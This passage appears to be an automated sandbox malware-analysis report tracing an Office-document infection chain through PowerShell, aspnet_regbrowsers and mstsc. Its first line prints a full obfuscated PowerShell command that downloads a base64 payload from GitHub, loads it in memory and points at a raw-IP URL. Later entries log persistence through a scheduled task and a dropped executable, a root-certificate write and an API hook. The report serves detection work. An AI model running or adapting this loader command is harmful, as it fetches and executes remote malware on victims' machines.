      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00913AE1 LoadLibraryW,GetProcAddress,FreeLibrary,27_2_00913AE1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_002521C8 push ebx; iretd 15_2_002521EA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_002525C8 push ebx; retf 15_2_002525EA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_002596F4 push eax; iretd 17_2_002596FB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 17_2_00252A51 push eax; ret 17_2_00252A81
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_0041F05F push ecx; ret 22_2_0041F060
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 22_2_009FDFA1 push ecx; ret 22_2_009FDFB4
      Source: C:\Windows\explorer.exeCode function: 23_2_02828B02 push esp; retn 0000h23_2_02828B03
      Source: C:\Windows\explorer.exeCode function: 23_2_02828B1E push esp; retn 0000h23_2_02828B1F
      Source: C:\Windows\explorer.exeCode function: 23_2_028289B5 push esp; retn 0000h23_2_02828AE7
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC59B5 push esp; retn 0000h23_2_05FC5AE7
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC5B1E push esp; retn 0000h23_2_05FC5B1F
      Source: C:\Windows\explorer.exeCode function: 23_2_05FC5B02 push esp; retn 0000h23_2_05FC5B03
      Source: C:\Windows\explorer.exeCode function: 23_2_0610EB1E push esp; retn 0000h23_2_0610EB1F
      Source: C:\Windows\explorer.exeCode function: 23_2_0610EB02 push esp; retn 0000h23_2_0610EB03
      Source: C:\Windows\explorer.exeCode function: 23_2_0610E9B5 push esp; retn 0000h23_2_0610EAE7
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00938B01 push ecx; ret 27_2_00938B14
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_021EDFA1 push ecx; ret 27_2_021EDFB4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009F05F push ecx; ret 27_2_0009F060
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009D485 push eax; ret 27_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009D4DB push eax; ret 27_2_0009D542
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009D4D2 push eax; ret 27_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0009D53C push eax; ret 27_2_0009D542
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_000975C5 push eax; retf 27_2_000975DC
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, KOyxUxFkac9s0mWEiL.csHigh entropy of concatenated method names: 'ToString', 'p1Io7wlQLf', 'n1go09VejO', 'GONoJGQBVR', 'Quioe5FUUw', 'FNyo2vBnbi', 'XkroQlkYFY', 'uGloKae8Aa', 'Y8woLqp3if', 'ULCoROHWad'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Npll84EqJnqes8PU4k.csHigh entropy of concatenated method names: 'EiqdxyPjgQ', 'mmQdXyGpQ0', 'sFXdOfcI2L', 'onHdg6hmlN', 'S4adnE824e', 'FdmOlNQT4T', 'eelOVZPifr', 'SiEOwk0e6K', 'ImROhF9UQW', 'bA1Oyaf6E6'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.csHigh entropy of concatenated method names: 'oiscxBR8Ar', 'gxDc8MfsRP', 'RpDcXwYabl', 'DVfcI1KYCP', 'kXAcO53D4e', 'Sw2cd2Joni', 'eaScg4UBD9', 'N10cnFufxY', 'N9tc5DjZgu', 'pBIcbB2uBw'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Q2oJDmy00BXR9JkIeC.csHigh entropy of concatenated method names: 'WsPvEfxg0Y', 'mCJv0i3v1f', 'PwZvJVehf7', 'kZMveKVBWk', 'VYDvHVyuBD', 'TrGv22FWCP', 'Next', 'Next', 'Next', 'NextBytes'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, igFyWPPDbgu1vlvK0Rv.csHigh entropy of concatenated method names: 'uD5SBOJIet', 'FnHSuHxmsg', 'iMISMZb1D5', 'ePxTaIk9Kj3dSZWMIXK', 'EMWeR8kNqSCHhpVGGpQ', 'f3xYBeks2prfBOPELmc', 'NbMpfHk1NYvkoU7mMFA'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Khu1KpRl9QfJpTnZtS.csHigh entropy of concatenated method names: 'tbegB17O8M', 'oUDguks6m0', 'rFrgMoRTbF', 'z1dgpHG8RC', 'TbOgtJbQ5s', 'L6YgmFrJfA', 'A9Lg3ZNYte', 'uHhgC4Q70Z', 'wR1gTh20pn', 'A2QgUFRyoN'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, XhLOTNDGt3lebXMjYs.csHigh entropy of concatenated method names: 'ngAMlnOD5', 'PsEppJsVG', 'TrgmpVlIO', 'cBT3K9uMI', 'vc5T4Idtc', 'OohURnBjm', 'RXA6rOIo1D55MKNOB7', 'OxfjHwc2Qr86E1ZRcl', 'iXFvVVUfo', 'CBJSgeACw'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, wflNJsPW7xG5EuwBK3u.csHigh entropy of concatenated method names: 'Q4faBCr1Sg', 'mlDauPZoLf', 'UcJaMMcL9N', 'VhyapZyJpp', 'T0katyV2ti', 'UqJamtHy6C', 'sR6a3jL9Xf', 'MvTaCdEvNy', 'VI6aTQO80S', 'iS4aUdI9CX'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, UnlIYYVlFoWapW9hnd.csHigh entropy of concatenated method names: 'hDSYh4lAL8', 'X6tYidIxlw', 'xHVvWASXL2', 'vtGvPBXXrZ', 'c0iY7BnH0F', 'BXYYZ40Jfk', 'TykY6a8pBG', 'aQSYHaAXW9', 'MR8YqrdqCk', 'wceYFnoCme'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, FOl8GuzMLVRcEJqPxI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o2va9sOLyb', 'idkakVbnOF', 'uUNaoLWJA9', 'AQAaYE8exk', 'GoNav2M7Ep', 'sTdaaObRTC', 'KvKaSVb66y'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, UoImFtINJ1OjinSk4C.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'qLNDymKAEa', 'G0uDi9nX9O', 'bjmDzFfNop', 'VaqcWRBs7A', 'QCOcP6cfy5', 'Rh8cDEpFVx', 'wZZccLmZfi', 'jB9UTdHl53g0VC9MEK7'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, lx0luIHPk66GXESpS8.csHigh entropy of concatenated method names: 'dN6kNSoFJK', 'Ld7kZSshZ5', 'Mp5kHf1YXU', 'gGdkqgFxRe', 'Yqek04ibpT', 'b3JkJcTclG', 'z9BkeIvs70', 'mAHk28B9S4', 'Hj8kQNMeE1', 'LKDkK2bYBl'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DHuktyKo2fycCX3uA0.csHigh entropy of concatenated method names: 'OmSg8A0hZm', 'ChIgIh26XA', 'XFJgdiVIPA', 'oPjdij3e7K', 's22dzisAiV', 'QSOgWNIBPs', 'nYNgPo5NjW', 'HCOgDOor3w', 'NJxgcQxfDk', 'G25gAqqKJe'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, b453MoAcKKbNNntlid.csHigh entropy of concatenated method names: 'ycJPgmBC8b', 'TH7PnH4rWr', 'zioPbH5J7Q', 'z8EPjgAenF', 'tsxPk1ONpl', 'U84PoqJnqe', 'kkyG2eN601FUBwSQIA', 'Yc7TpLKhlgBWkhJDnu', 'EiGvhm968rTiNQTrdl', 'xhkPPS2OuL'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, dkL5LD6m60pv1U2kLX.csHigh entropy of concatenated method names: 's0A9CsjUvA', 'jJU9TQxExr', 'eie9Eh2k8c', 'EpK90Vh6BW', 'xN79eAp2NA', 'H2w92sLRiO', 'a8a9KVqnkJ', 'mWJ9LXY7mI', 'Xfu9NDHDxy', 'iZt97mbVwt'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, LGaigNPPLtls99aPKjL.csHigh entropy of concatenated method names: 'ToString', 'LLiScVapPY', 'BjqSAxAmQ4', 'lb3Sxit3na', 'K8GS8OkNGp', 'JKqSX1uiM5', 'QJfSIr2V4a', 'QdSSOH3Hcy', 'XGdpWckhIDU9FHrSnAo', 's3wxLukiwwu23v2Ci4L'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, yfTGjUPcXKcvNssMea7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DFDSHrAuqP', 'IX2SqwlZqs', 'OakSFT5AOg', 'BVwSfmNSbK', 'pfJSlhlDSl', 'dUVSVrEa9p', 'ev6SwAHIBY'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ePUHBFXDid6So55xZG.csHigh entropy of concatenated method names: 'Dispose', 'IynPywLwYj', 'uyqD0psZ7y', 'baJ22AHUf8', 'VedPiaVXkg', 'UbWPzW3jBt', 'ProcessDialogKey', 'Uh6DW2oJDm', 'H0BDPXR9Jk', 'heCDDFFwaK'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, HeZOc7fKQgt0IZRHSL.csHigh entropy of concatenated method names: 'VNZYbUx198', 'UiEYjeMLLG', 'ToString', 'fn4Y8rLMBj', 'VtgYXYMXFS', 'xDSYIsUHvu', 'jufYOG604J', 'qLDYd5AQ1C', 'k0CYgR6Xry', 'FpNYnKanvl'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, IdaVXkhglbWW3jBtVh.csHigh entropy of concatenated method names: 'drav8H5Wr8', 'xYDvXICKXM', 'EaNvIEvHhc', 'C25vORkbut', 'LVrvdLvCTD', 'SBXvg6My6Q', 'IgLvngodex', 'Dk8v5qSX0o', 'ufyvbYRGTH', 'VaNvj4gDWA'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ImBC8bCfH7H4rWrIxE.csHigh entropy of concatenated method names: 'YPvXHvAOlF', 'kmYXqD6Fdv', 'iYsXFh7Q07', 'aAiXfwqJK3', 'WudXlcVwCm', 'OEtXVC6o7v', 'LHqXwrxHIM', 'tPaXhSgNQ6', 'M85XyuN8bh', 'zWCXivckDV'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, SFwaKsiGrDwLLYJkD9.csHigh entropy of concatenated method names: 'OfWaPFkmfo', 'b8Zacx1u2m', 'wUaaA5gjxg', 'CKVa8iOaN8', 'LxvaXpYmHj', 'MXUaOlhjJR', 'UUMadBVxvB', 'VGavwP0WaT', 'xtuvhB9NDI', 'neVvyJ8rOC'
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, LqBjGMTioH5J7QM8Eg.csHigh entropy of concatenated method names: 'rFfIpX79wa', 'LV1ImRQ2GD', 'RWLICx5nZ8', 'tCbITLL9vn', 'i5EIkMyvtR', 'y74IoMWdpe', 'oRtIY0JX63', 'amaIvKIXgj', 'ORSIaScTLf', 'ioqISn6f4K'

      Persistence and Installation Behavior

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRootJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRootJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc.0.drJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 6035E009.doc.4.drJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile created: C:\Users\user\AppData\Roaming\niLILOT.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE4
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E88BF IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow,27_2_008E88BF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E8810 IsIconic,GetWindowPlacement,GetLastError,27_2_008E8810
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EC869 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,GetCursorPos,GetTitleBarInfo,SetCursorPos,SendMessageW,27_2_008EC869
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E99FA DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,CheckMenuItem,DefWindowProcW,27_2_008E99FA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EC134 IsWindowVisible,IsIconic,27_2_008EC134
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_00920BF5 GetWindowRect,GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos,27_2_00920BF5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EB319 LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,ShowWindow,SetWindowPos,SetWindowPos,SetWindowPos,LockWindowUpdate,27_2_008EB319
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EA341 IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,27_2_008EA341
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008EBCCB GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,AdjustWindowRectEx,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement,27_2_008EBCCB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E6416 IsIconic,GetWindowPlacement,GetWindowRect,27_2_008E6416
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
